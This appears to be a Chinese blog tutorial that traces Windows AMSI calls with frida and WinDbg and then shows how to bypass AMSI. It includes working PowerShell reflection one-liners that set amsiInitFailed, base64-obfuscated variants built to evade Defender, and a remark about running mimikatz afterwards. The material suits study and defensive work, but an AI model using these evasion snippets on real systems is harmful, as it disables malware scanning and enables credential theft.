AMSI调试及绕过

测试环境：

工具环境：

测试过程：

首先我们要知道AMSI是一个什么东西，之前做过相关的分享，这里就不再去啰嗦其概念了，一句话概括，win10自带的一个扫描接口，其核心组件存在于amsi.dll内，与windows defender相辅相成，过程如下：

更具体的函数结构体什么的，自己去看MSDN，链接给你们了。

https://docs.microsoft.com/en-us/windows/win32/api/amsi/nf-amsi-amsiinitialize

https://docs.microsoft.com/en-us/windows/win32/api/amsi/nf-amsi-amsiopensession

https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-functions

https://docs.microsoft.com/en-us/windows/win32/api/amsi/nf-amsi-amsiscanstring

https://docs.microsoft.com/en-us/windows/win32/api/amsi/nf-amsi-amsiscanbuffer

我们下面便开始从调试开始然后编写绕过amsi的脚本，调试过程为windbg与frida。

frida-trace -p 15 -x amsi.dll -i Amsi*

使用-p指定进程powershell的Pid，-x指定dll，-i使用*通配符来指定我们需要监控的API。

此时frida以及Hook住了amsi的相关函数，我们在powershell中输入字符串测试：

我们虽然识别了对AmsiOpenSession、AmsiScanBuffer和AmsiCloseSession的调用，但无法了解其内部过程，frida在Hook时默认会生成js文件，我们可以更改此类文件，来改变其Hook时的输出，方便我们理解整个过程。

首先是AmsiScanBuffer，默认如下：

将其更改如下：

此时我们再来进行测试：

此时以及变得容易查看与观看，然后我们输入经典的Amsi测试语句：

不出意外的被拦截了，我们换成绕过的语句：

从这个输入和输出，我们可以推断，WindowsDefender将“AmsiUtils”字符串标记为恶意。然而，我们很容易绕过了这个问题，即使用通过拆分和连接字符串进行保护。

下面我们打开windbg并也附加到powershell进程之中：

在powershell中输入字符串，测试：

所指的地方是其内存地址，我们使用windbg进行追踪：

dc：双字值(4字节)和ASCII字符。每个显示行都会显示行中第一个数据的地址，并且每行最多显示8个16进制值以及它们对应的ASCII字符。默认的显示数量为32个DWORD(128字节)。

我们不知道其大小，但可以看到AMSI的ASCII字符，为了知道其调用方式，我们需要unassemble，AMSI模块的AmsiOpenSession功能

我们可以看到我圈起来的地方有明显的内存比较的过程，而rcx将包含AmsiOpenSession的功能原型，其中有Jne指令，为跳转到0x4c，我们跟一下

条件跳转最终导致函数退出，其静态值为80070057h，根据AmsiOpenSession函数原型我们可知，其为一个返回值为句柄的函数：

HRESULT AmsiOpenSession(  HAMSICONTEXT amsiContext,  HAMSISESSION *amsiSession);

而80070057h则代表：

到此我们已经了解其大体过程，下面我们来使用windbg来走一遍，下断点，并将rcx中的amsi patch掉：

此时便已经绕过了amsi打印出了我们的字符串。下面我们使用Powershell的反射来进行Amsi的绕过，其主要信息存储在：

System.Management.Automation.AmsiUtils

这个好说，我们可以使用循环遍历方法来绕过，主要是获取amsiContext的值：

将其转成hex便是它的内存地址：

根据前面的测试我们知道，我们只需要patch前四个字节即可。我们将其patch之后，然后再来查看：

此时已无AMSI，再来测试：

当然你也可以使用下面这类方法：

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFai led','NonPublic,Static').SetValue($null,$true)

新开一个powershell测试：

没关系，我们来bypass，之前有人利用的是base64：

[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)

但现在已经会被标记并查杀了，我们这里对他进行增强：

function b64decode { param ($encoded)  $decoded = $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($en coded))  return $decoded }   $1 = b64decode("U3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5BbXNpVXRpbHM=")   $2 = b64decode("YW1zaUluaXRGYWlsZWQ=")   $3 = b64decode("Tm9uUHVibGljLFN0YXRpYw==")   [Ref].Assembly.GetType($1).GetField($2,$3).SetValue($null,$true)

注：此类方法不太适合mimikatz，可以执行，但执行后便会被查杀。若非要使用，则最后使用变换过的mimikatz。

本文始发于微信公众号（鸿鹄实验室）：AMSI调试及绕过